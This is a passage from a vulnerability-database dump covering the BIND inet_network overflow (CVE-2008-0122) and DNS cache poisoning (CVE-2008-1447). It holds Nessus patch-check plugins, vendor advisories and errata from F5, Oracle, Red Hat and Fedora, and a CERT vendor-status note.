obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:01:22", "description": "SunOS 5.8: libresolv.so.2, in.named and BI.\nDate this patch was last updated by Sun : Mar/09/09", "edition": 23, "published": "2004-07-12T00:00:00", "title": "Solaris 8 (sparc) : 109326-24", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-2930", "CVE-2009-0696", "CVE-2008-4194"], "modified": "2004-07-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_109326.NASL", "href": "https://www.tenable.com/plugins/nessus/13321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13321);\n script_version(\"1.55\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2930\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2008-4194\", \"CVE-2009-0696\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Solaris 8 (sparc) : 109326-24\");\n script_summary(english:\"Check for patch 109326-24\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109326-24\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: libresolv.so.2, in.named and BI.\nDate this patch was last updated by Sun : Mar/09/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/109326-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcstlx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWarcx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-09-01T23:49:39", "description": "SunOS 5.10: libc.so.1.9 patch.\nDate this patch was last updated by Sun : Jun/06/08", "edition": 5, "published": "2008-06-18T00:00:00", "title": "Solaris 10 (sparc) : 136892-01", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "modified": "2018-08-13T00:00:00", "cpe": [], "id": "SOLARIS10_136892.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33205", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33205);\n script_version(\"1.14\");\n\n script_name(english: \"Solaris 10 (sparc) : 136892-01\");\n script_cve_id(\"CVE-2008-0122\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 136892-01\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: libc.so.1.9 patch.\nDate this patch was last updated by Sun : Jun/06/08');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/136892-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/06/18\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 136892-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2016-09-26T17:23:01", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "edition": 1, "description": "An off-by-one error in the **inet_network() **function in **libbind** could lead to memory corruption with certain inputs. **libbind** has a vulnerability in the **inet_network** API. However, this API is not used by any F5 products that use the affected version of BIND.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0122>\n\nF5 Product Development is tracking this issue as CR92595.\n", "modified": "2013-03-19T00:00:00", "published": "2008-04-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/500/sol8578.html", "id": "SOL8578", "title": "SOL8578 - Security Advisory: BIND buffer overflow in inet_network CVE-2008-0122", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management &gt; Configuration &gt; Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "[30:9.3.4-6.P1]\n- final 5.2 version\n- minor changes in initscript\n - improved patches for #250744 and #250901\n[30:9.3.4-5.P1]\n- improved patch to handle D-BUS races (#240876)\n- updated named.root zone to affect root IPv6 migration\n[30:9.3.4-4.P1]\n- improved fix for #253537, posttrans script is now used\n- do not call restorecon on chroot/proc\n[30:9.3.4-3.P1]\n- CVE-2008-0122 (small buffer overflow in inet_network)\n[30:9.3.4-2.P1]\n- ship /usr/include/dst/gssapi.h file\n[30:9.3.4-1.P1]\n- CVE-2007-6283 (#419421)\n[30:9.3.4-0.9.2.P1]\n- added GSS-TSIG support to nsupdate (#251528)\n[30:9.3.4-0.9.1.P1]\n- updated L.ROOT-SERVERS.NET address in lib/dns/rootns.c file\n[30:9.3.4-0.9.P1]\n- fixed building of SDB stuff (#240788)\n- fixed race condition during DBUS initialization (#240876)\n- initscript LSD standardization (#242734)\n[command (#247148)]\n- fixed wrong perms of named's ldap schema (#250118)\n- supressed errors from chroot's specfile scripts (#252334)\n- fixed /dev/random SELinux labelling\n- added configtest to usage report from named initscript (#250744)\n- fixed rndc stop return value handler (#250901)\n- fixed named.log sync in bind-chroot-admin (#247486)\n- rebased to latest 9.3 maintenance release (9.3.4-P1, #353741)\n- updated named.root file (new L.ROOT-SERVERS.NET, #363531)\n- added GSS-TSIG support to named (#251528)\n - dropped patches (upstream)\n - bind-9.3.4.P1-query-id.patch\n - bind-9.3.3rc2-dbus-0.6.patch\n - bind-9.3.4-validator.patch\n - bind-9.3.4-nqueries.patch\n - updated patches\n - bind-9.3.2-tmpfile.patch", "edition": 4, "modified": "2008-05-30T00:00:00", "published": "2008-05-30T00:00:00", "id": "ELSA-2008-0300", "href": "http://linux.oracle.com/errata/ELSA-2008-0300.html", "title": "bind security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283", "CVE-2008-0122"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\r\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\r\nlibrary (routines for applications to use when interfacing with DNS); and\r\ntools for verifying that the DNS server is operating correctly.\r\n\r\nIt was discovered that the bind packages created the \"rndc.key\" file with\r\ninsecure file permissions. This allowed any local user to read the content\r\nof this file. A local user could use this flaw to control some aspects of\r\nthe named daemon by using the rndc utility, for example, stopping the named\r\ndaemon. This problem did not affect systems with the bind-chroot package\r\ninstalled. (CVE-2007-6283)\r\n\r\nA buffer overflow flaw was discovered in the \"inet_network()\" function, as\r\nimplemented by libbind. An attacker could use this flaw to crash an\r\napplication calling this function, with an argument provided from an\r\nuntrusted source. (CVE-2008-0122)\r\n\r\nAs well, these updated packages fix the following bugs:\r\n\r\n* when using an LDAP backend, missing function declarations caused\r\nsegmentation faults, due to stripped pointers on machines where pointers\r\nare longer than integers.\r\n\r\n* starting named may have resulted in named crashing, due to a race\r\ncondition during D-BUS connection initialization. This has been resolved in\r\nthese updated packages.\r\n\r\n* the named init script returned incorrect error codes, causing the\r\n\"status\" command to return an incorrect status. In these updated packages,\r\nthe named init script is Linux Standard Base (LSB) compliant.\r\n\r\n* in these updated packages, the \"rndc [command] [zone]\" command, where\r\n[command] is an rndc command, and [zone] is the specified zone, will find\r\nthe [zone] if the zone is unique to all views.\r\n\r\n* the default named log rotation script did not work correctly when using\r\nthe bind-chroot package. In these updated packages, installing\r\nbind-chroot creates the symbolic link \"/var/log/named.log\", which points\r\nto \"/var/named/chroot/var/log/named.log\", which resolves this issue.\r\n\r\n* a previous bind update incorrectly changed the permissions on the\r\n\"/etc/openldap/schema/dnszone.schema\" file to mode 640, instead of mode\r\n644, which resulted in OpenLDAP not being able to start. In these updated\r\npackages, the permissions are correctly set to mode 644.\r\n\r\n* the \"checkconfig\" parameter was missing in the named usage report. For\r\nexample, running the \"service named\" command did not return \"checkconfig\"\r\nin the list of available options.\r\n\r\n* due to a bug in the named init script not handling the rndc return value\r\ncorrectly, the \"service named stop\" and \"service named restart\" commands\r\nfailed on certain systems.\r\n\r\n* the bind-chroot spec file printed errors when running the \"%pre\" and\r\n\"%post\" sections. Errors such as the following occurred:\r\n\r\nLocating //etc/named.conf failed:\r\n[FAILED]\r\n\r\nThis has been resolved in these updated packages.\r\n\r\n* installing the bind-chroot package creates a \"/dev/random\" file in the\r\nchroot environment; however, the \"/dev/random\" file had an incorrect\r\nSELinux label. Starting named resulted in an 'avc: denied { getattr } for\r\npid=[pid] comm=\"named\" path=\"/dev/random\"' error being logged. The\r\n\"/dev/random\" file has the correct SELinux label in these updated packages.\r\n\r\n* in certain situations, running the \"bind +trace\" command resulted in\r\nrandom segmentation faults.\r\n\r\nAs well, these updated packages add the following enhancements:\r\n\r\n* support has been added for GSS-TSIG (RFC 3645).\r\n\r\n* the \"named.root\" file has been updated to reflect the new address for\r\nL.ROOT-SERVERS.NET.\r\n\r\n* updates BIND to the latest 9.3 maintenance release.\r\n\r\nAll users of bind are advised to upgrade to these updated packages, which\r\nresolve these issues and add these enhancements.", "modified": "2017-09-08T11:59:35", "published": "2008-05-20T04:00:00", "id": "RHSA-2008:0300", "href": "https://access.redhat.com/errata/RHSA-2008:0300", "type": "redhat", "title": "(RHSA-2008:0300) Moderate: bind security, bug fix, and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283", "CVE-2008-0122"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2008-01-22T16:01:26", "published": "2008-01-22T16:01:26", "id": "FEDORA:M0MG2IGR000424", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-23.b1.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2008-01-22T16:01:40", "published": "2008-01-22T16:01:40", "id": "FEDORA:M0MG2IGT000424", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: bind-9.4.2-3.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2007-12-20T19:49:29", "published": "2007-12-20T19:49:29", "id": "FEDORA:LBKJNVQ8025472", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-20.b1.fc8", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight, easy to configure DNS forwarder and DHCP server. It is designed to provide DNS and, optionally, DHCP, to a small network. It can serve the names of local machines which are not in the global DNS. The DHCP server integrates with the DNS server and allows machines with DHCP-allocated addresses to appear in the DNS with names configured either in each host or in a central configuration file. Dnsmasq supports static and dynamic DHCP leases and BOOTP for network booting of diskless machines. ", "modified": "2009-02-14T22:11:22", "published": "2009-02-14T22:11:22", "id": "FEDORA:EB89E20852E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dnsmasq-2.45-1.fc9", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cert": [{"lastseen": "2020-09-18T20:42:37", "bulletinFamily": "info", "cvelist": ["CVE-2008-0122"], "description": "### Overview \n\nThe` inet_network()` resolver function contains an off-by-one buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe `inet_network()` function takes a character string representation for an internet address and returns the internet network number in integer form. `inet_network()` is implemented by various libbind, libc, and [GNU libc](<http://www.gnu.org/software/libc/>) versions. Applications that link against a vulnerable version of `inet_network()` may be vulnerable to a one-byte overflow. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update**\n\n**FreeBSD libc** \\- Apply the patch in FreeBSD Security Advisory [FreeBSD-SA-08:02.libc](<http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>) \n**GNU libc** \\- This issue was resolved on February 11, 2000 in the main ([diff](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&r2=1.9&cvsroot=glibc&f=h>)) and glibc 2.1 ([diff](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&r2=1.6.2.2&cvsroot=glibc&f=h>)) branches \n**libbind** \\- This issue will be resolved in libbind 9.3.5, 9.4.3, 2.5.0b2, or later. A patch is also available in the ISC [Advisory](<http://www.isc.org/sw/bind/bind-security.php>) \n \n--- \n \n### Vendor Information\n\n203611\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### FreeBSD, Inc. __ Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nApply the patch in FreeBSD Security Advisory [FreeBSD-SA-08:02.libc](<http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23203611 Feedback>).\n\n### GNU glibc __ Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe GNU C library is not vulnerable. Ulrich Drepper contributed a fix for that bug on 2000-02-11, shortly after importing the code from BIND 8.2.2.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD __ Affected\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nlibbind is available in the OpenBSD ports repository.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23203611 Feedback>).\n\n### Apple Computer, Inc. __ Not Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe issue described in CVE-2008-0122 does not affect Apple products.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Not Affected\n\nNotified: January 17, 2008 Updated: April 28, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Not Affected\n\nNotified: January 17, 2008 Updated: January 31, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nRegarding the ISC report concerning a vulnerability in libbind: \nThe function inet_network() contains a 1-byte overflow. However, \nHP is not affected by this 1-byte overflow in inet_network(), because our \ninet_network() API implementation in HP-UX (B.11.11, B.11.23, B.11.31) is \ndifferent than other operating systems.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Infoblox __ Not Affected\n\nNotified: January 17, 2008 Updated: January 31, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have evaluated our exposure to exploit #VU203611 (CVE-2008-0122) and have determined we are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. __ Not Affected\n\nNotified: January 17, 2008 Updated: January 29, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIngrian networks products are not succeptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. __ Not Affected\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMandriva does not provide libbind, and no applications are linked against it therefore Mandriva is not vulnerabe to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Not Affected\n\nNotified: January 17, 2008 Updated: January 18, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CentOS Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nTo our knowledge, this vulnerability has already been fixed in the GNU libc resolver in 2000; no current Debian release is affected as a result. \n \nThe bind-dev package contains a copy of the vulnerable BIND 8 code, but it is not used by Debian.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. 